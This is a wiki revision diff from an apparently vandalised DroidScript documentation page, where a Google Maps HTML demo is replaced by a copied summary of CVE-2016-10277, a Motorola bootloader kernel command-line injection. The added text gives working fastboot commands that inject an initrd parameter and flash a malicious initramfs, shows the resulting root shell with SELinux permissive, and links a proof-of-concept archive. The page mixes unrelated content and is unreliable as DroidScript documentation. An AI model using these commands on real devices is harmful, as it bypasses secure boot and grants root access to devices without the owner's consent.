DroidScript Wiki

User Tools

Site Tools

Trace: bugs_and_requests tips_tricks dokuwiki image_rotate random_file_acces unzip_folders
built_in:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision 		Previous revision
Next revision Both sides next revision
built_in:start [2018/12/30 01:44]
114.125.57.28 [Built-in features - DroidScript API] 		built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
Line 1: Line 1:
-<!DOCTYPE html> +Sources: 
-<html> +https://alephsecurity.com/2017/08/30/untethered-initroot
-  <head> +https://github.com/alephsecurity/initroot 
-    <style> + 
-       /* Set the size of the div element that contains the map */ +initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) 
-      #map { + 
-        height: 400px;  /* The height is 400 pixels *+By Roee Hay Aleph Research, HCL Technologies 
-        width100%;  /* The width is the width of the web page */ + 
-       } +Recap of the Vulnerability and the Tethered-jailbreak 
-    </style> + 
-  </head> +1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 
-  <body> +2. Using a proprietary fastboot OEM commandonly available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address
-    <h3>My Google Maps Demo</h3> +3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 
-    <!--The div element for the map --> +4Exploiting the vulnerability allows the adversary to gain unconfined root shell
-    <div id="map"></div> +5Since the initramfs payload is injected into RAM by the adversarythe vulnerability must be re-exploited on every reboot. 
-    <script> +For examplehere is a successful run of the exploit on cedric (Moto G5
-// Initialize and add the map + 
-function initMap() { +$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"  
-  // The location of Uluru +$ fastboot flash aleph initroot-cedric.cpio.gz  
-  var uluru = {lat: -25.344lng: 131.036}; +$ fastboot continue 
-  // The map, centered at Uluru + 
-  var map = new google.maps.Map( +$ adb shell  
-      document.getElementById('map'){zoom: 4center: uluru}); +cedric:/ # id 
-  // The marker, positioned at Uluru +uid=0(rootgid=0(rootgroups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 
-  var marker new google.maps.Marker({position: uluru, map: map}); +cedric:/ # getenforce 
-} +Permissive 
-    </script> +cedric:/ # 
-    <!--Load the API from the specified URL + 
-    * The async attribute allows the browser to render the page while the API loads + 
-    * The key parameter will contain your own API key (which is not needed for this tutorial) +Proof of Concept: 
-    * The callback parameter executes the initMap() function +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip 
-    --> + 
-    <script async defer +            
-    src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&callback=initMap"> +
-    </script> +
-  </body> +
-</html>+
 ====Links==== ====Links====
 ^App and Layout^ ^App and Layout^
built_in/start.txt · Last modified: 2018/12/31 01:07 (external edit)

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki